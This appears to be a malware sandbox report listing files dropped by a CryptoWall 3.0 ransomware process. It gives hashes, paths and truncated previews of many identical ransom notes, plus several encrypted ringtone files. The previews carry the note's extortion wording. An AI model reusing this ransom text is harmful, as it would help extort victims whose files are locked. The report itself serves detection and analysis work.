                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows NT\MSScan\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows NT\MSScan\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows NT\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows NT\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\AIT\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\AIT\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Caches\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Caches\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\DRM\Cache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\DRM\Cache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\DRM\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\DRM\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):202254
                                                                                                                          Entropy (8bit):7.9990215591203775
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:oCmUOmqEJHzNto4A4JrQpDjMW9BHln8azhxAd:3l9xzk4ArDDxR3hU
                                                                                                                          MD5:6EFE5544CF3FC43182281D4BF8DD2C07
                                                                                                                          SHA1:3D0CBA54D4496CF099B1E7528DC34CC3B70A51B5
                                                                                                                          SHA-256:8BEA187BD16E63483B2FA5BAA3FE611D6E1B2952CB403FCBBEE81C4D98E847EB
                                                                                                                          SHA-512:D57801ABA738C0A35A1C9BA4D52378FB51A4053EE014CEA0F864EF93F55399CAE2A4C62769A1DB4D7E9390C02846290EACAA7AA6A1449E19E15D641074038B63
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..)..e........m..i......r.;N...i....h..Y.0tm.9B....Y.......G...g.$..G........W..N.{j.......@....Z.u.k....rs#F..bT....8.6T%.YW...*[.RTP...{....@!1..5m..9.,....4..M?..$U......B.q...........d..H.......7..y.5.........w^.M>\.d.. ...../.A'.7...N.....j.?.smF..t..,V.-g-..U...v..`R..)......uW....-I..Nb.y,.y.$,.:Rh;.b.c.m.oGx..9.... .D?!2..'.%Fxc*.W.Q../j..%...{.T..\.%w/.H.........G.....q..`.4.z.xw."....A.a...S...T........Z.!l.6....].R..t`..{W..U'..Q.<............?$q".{TF. H1.....?..G.....~~..6...K..%..W.u~9[...m..9..C.P...R..S..N^[+..g..\........;{Cy.W.@......GU&..0..pP^./...&.3&1

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):139614
                                                                                                                          Entropy (8bit):7.998657178117629
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:QoQ/7sILmdqUVlxF8DHVpzT9Vd52vcd/ML3mSDhq2P21bn:Qajl/8DHVpzT9xWcdkL3mCT2d
                                                                                                                          MD5:77B6E03D5C36ACD556628F1E6CA2E217
                                                                                                                          SHA1:C9C6353B85460FFE2F9B4431167C3FDC6E3DE5D2
                                                                                                                          SHA-256:210D4BC307E0B0D8A78F552E54A5FBA6142EA4ED6CE91375AFF8063288986628
                                                                                                                          SHA-512:F7C4EDB9A9744E33BE08F6C368FDFFDED21EA760E186661C8D1B602173172DC8FE0BB1BD61AE1921246E47556691DD06C080DE309369F24C707AFABCFFC6DFD1
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..8..`F..Ms....On....4mD...1.3...p...#...(..~..F.t....OL....Nk...PF_..}A27..Kz1..].X..U{.'....+3..e.1kt.tip......pM*......;%G"..r.....4l..\-'H.(sf..m...3n..Q..=.y.'..a.......L.A.......C.A'f]...v.A....P;1.d....O,.u.......{;jjb........W.2"...!....V%.>.:.Z.a. i...?.. ..G.+......~."..tN~.?T.rM..D?%......b=8.h.F..L.Q~.eM..al..:..4..^s.w..pjd...l......(|<..\.Pn.w...=..:......R.R.s`.k..~.m....z..G,.....IRt.C`..'<s.H.n.R.k;O./.v.....3...>E' ../.w.3..p}........O.7......Q....,S.}....6.G#IP~nC.Jj`7......*N...!.].&F.....^%...c.]........ow../.m.....I..._.;...w..<...:w.hN{.q..s...-..

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.997962580304283
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:sm6Loj4bBllPXaPTHmRgMOgC47dJXCIXQiXougEABgx7T/yYmcz+kvfI:smUpbdXab6gMN7TCIXwugEcgx7TK4+ko
                                                                                                                          MD5:1DC74E633F81D13616F728732027F893
                                                                                                                          SHA1:0F113B850B56FA820908C1BB78F6D3AB670F124C
                                                                                                                          SHA-256:634B5C2DC25FAE3E653FA132A5CF36F63A8FDFD6216570CC2B22038890AAE6DD
                                                                                                                          SHA-512:8B4A6EC2FB4214C99AA41ECA263D03369F7A3FEF9C5DDE14CB1F00FE224F3950004BBEB3C4AF251858BB2C59A39362CADD19C6B50C2191CF6AE1CD8C79EB677E
                                                                                                                          Malicious:true
